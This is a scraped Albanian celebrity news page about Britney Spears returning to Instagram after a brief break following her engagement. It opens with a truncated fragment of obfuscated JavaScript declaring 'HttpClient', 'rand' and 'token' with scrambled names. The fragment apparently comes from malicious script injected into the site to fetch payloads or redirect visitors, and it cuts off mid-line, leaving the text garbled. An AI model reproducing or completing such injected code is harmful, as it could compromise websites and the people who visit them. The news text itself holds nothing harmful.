;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Britney Spears rikthehet pas vendimit të saj drastik

By

Pushimet e Britney Spears me të fejuarin e saj, Sam Asghari nuk ishin vetëm festim për fejesën e tyre – ishte edhe arsyeja pse ajo u rikthye në Instagram.

Këngëtarja publikoi dy foto identike – një bardh e zi dhe tjetra me ngjyra – dhe tha se këto u shkrepën gjatë pushimeve në Palm Springs.

Gjithashtu ajo shkroi se, “Nuk mund të qëndroja larg Instagram-it më shumë kështu që u ktheva”.

View this post on Instagram

A post shared by Britney Spears (@britneyspears)

Siç është bërë e ditur, dy ditë pasi ajo pranoi propozimin për martesë, Britney fshiu llogarinë e saj në Instagram.

“Mos u shqetësoni njerëz… po marr pak pushim nga rrjetet sociale që të festoj fejesën time. Do të kthehem shpejtë”, kishte njoftuar ajo.

Pushimi nga rrjetet sociale zgjati vetëm një javë për këngëtaren. Gjithashtu, na ndajnë vetëm 9 ditë nga paraqitja e saj në gjyq në lidhje me kujdestarinë e babait. /Prive.al

Artikuj të ngjashëm